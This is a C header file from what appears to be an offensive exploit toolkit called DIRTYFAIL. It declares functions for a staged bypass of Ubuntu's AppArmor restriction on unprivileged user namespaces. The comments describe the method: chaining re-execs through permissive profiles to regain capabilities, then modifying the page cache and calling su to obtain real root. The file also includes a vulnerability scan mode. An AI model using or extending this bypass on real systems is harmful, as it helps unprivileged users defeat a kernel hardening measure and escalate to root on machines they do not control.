/*
 * DIRTYFAIL — apparmor_bypass.h
 *
 * Defeat Ubuntu's `apparmor_restrict_unprivileged_userns=1` policy.
 *
 * The default Ubuntu apparmor profile applied to unprivileged programs
 * lets `unshare(CLONE_NEWUSER)` succeed but **strips CAP_NET_ADMIN**
 * inside the new namespace — so XFRM SA registration, raw sockets, etc.
 * fail downstream even though we appear to be uid 0 in our userns.
 *
 * The bypass: switch to a permissive AppArmor profile (`crun`, `chrome`,
 * etc.) via `change_onexec` *before* unshare. Those profiles don't
 * carry the userns-cap-strip rule, so the kernel hands us the full
 * effective set inside the new namespace.
 *
 * Mechanics — three stages, two re-execs:
 *
 *   stage 0 (entry):   change_onexec(crun);   execv(self, AA1, ...args)
 *   stage 1 (in crun): change_onexec(chrome); execv(self, AA2, ...args)
 *   stage 2 (in chrome): unshare(USER|NET); maps; capset; ambient caps;
 *                        re-enter normal main() flow with bypass marked
 *
 * The two-hop dance is what `aa-rootns` (Brad Spengler / 0xdeadbeef)
 * demonstrated. The "chrome" hop is technically optional — the "crun"
 * profile is already unconfined for our purposes — but the second hop
 * defeats some hardened policies that audit chained execs.
 *
 * Detection of "do we need the bypass?" is best-effort:
 *   - read /proc/self/attr/current; if it ends with " (enforce)" and
 *     mentions "unprivileged_userns", we're being restricted.
 *   - or: probe by spawning a child that does unshare(CLONE_NEWUSER)
 *     and tries `ip link add type dummy` — if that fails with EPERM,
 *     the caps were stripped.
 */

#ifndef DIRTYFAIL_APPARMOR_BYPASS_H
#define DIRTYFAIL_APPARMOR_BYPASS_H

#include "common.h"

/* Stage markers used as argv[1] to route re-execs. */
#define AA_STAGE1_TAG "DIRTYFAIL-AA-STAGE-1"
#define AA_STAGE2_TAG "DIRTYFAIL-AA-STAGE-2"

/* Returns true if `argv[1]` is one of the AA-* stage markers, in which
 * case main() should hand control to apparmor_bypass_run_stage(). */
bool apparmor_bypass_is_stage(int argc, char **argv);

/* Execute the appropriate stage based on argv[1]. This either re-execs
 * self (stage 1) or returns the modified argv after unshare+caps setup
 * for the caller to continue with (stage 2). The function does not
 * return on stage 1 (always execv). On stage 2, returns 0 on success
 * and writes the caller's continuation argv to *out_argc / *out_argv. */
int apparmor_bypass_run_stage(int argc, char **argv,
                              int *out_argc, char ***out_argv);

/* Probe: does this process actually need the bypass to gain
 * CAP_NET_ADMIN inside a fresh user namespace? Returns true if YES. */
bool apparmor_bypass_needed(void);

/* True iff stage 2 of the bypass ran successfully in this process —
 * i.e. we're now inside a fresh user/net namespace with full caps,
 * and any further unshare() would nest. Exploit modules check this
 * before deciding whether to fork+unshare on their own. */
bool apparmor_bypass_was_armed(void);

/* Probe whether the bypass actually grants caps on this kernel.
 * Forks a child that does unshare(USER) and tries to write to
 * /proc/self/setgroups; if that fails with EPERM, we're on a kernel
 * (Ubuntu 26.04+) that auto-transitions to the unprivileged_userns
 * sub-profile and denies caps regardless of bypass technique.
 *
 * Returns true if unprivileged userns is COMPREHENSIVELY blocked
 * (the bug class is unreachable for unprivileged users). Returns
 * false if userns operations work normally OR if AA isn't loaded
 * at all (in which case `apparmor_bypass_needed()` would also
 * return false).
 *
 * This is the right signal for `--scan` to report "VULNERABLE in
 * kernel but LSM-mitigated" vs plain "VULNERABLE".
 */
bool apparmor_userns_caps_blocked(void);

/* Fork a child that arms the AA bypass and re-execs itself through
 * the stages. The child eventually lands inside a fresh user/net
 * namespace with full caps; main() in that re-exec'd image dispatches
 * to the inner-mode handler indicated by the DIRTYFAIL_INNER_MODE
 * environment variable.
 *
 * The PARENT stays in the init namespace and waits for the child via
 * waitpid. After the child exits, the parent can read the global
 * page cache (which reflects whatever the child modified) and then
 * execlp("su", ...) in init namespace to reach REAL init-ns root —
 * this is the whole point of the outer/inner split.
 *
 * Caller must setenv("DIRTYFAIL_INNER_MODE", "...", 1) and any other
 * mode-specific env vars BEFORE calling this. The child inherits the
 * full environment.
 *
 * Returns the child's exit code on success. -1 on fork failure. */
int apparmor_bypass_fork_arm(int argc, char **argv);

/* Trigger the bypass: change_onexec(crun) then re-exec self with stage
 * markers. Caller passes the argv it wants to resume with (stage 2 will
 * hand that argv back via apparmor_bypass_run_stage's out_argv).
 *
 * Does not return on success (control transfers to the new process
 * image). Returns -1 with errno set if the change_onexec or execv
 * failed; in that case the caller may continue without bypass and let
 * downstream syscalls fail loudly. */
int apparmor_bypass_arm_and_relaunch(int argc, char **argv);

#endif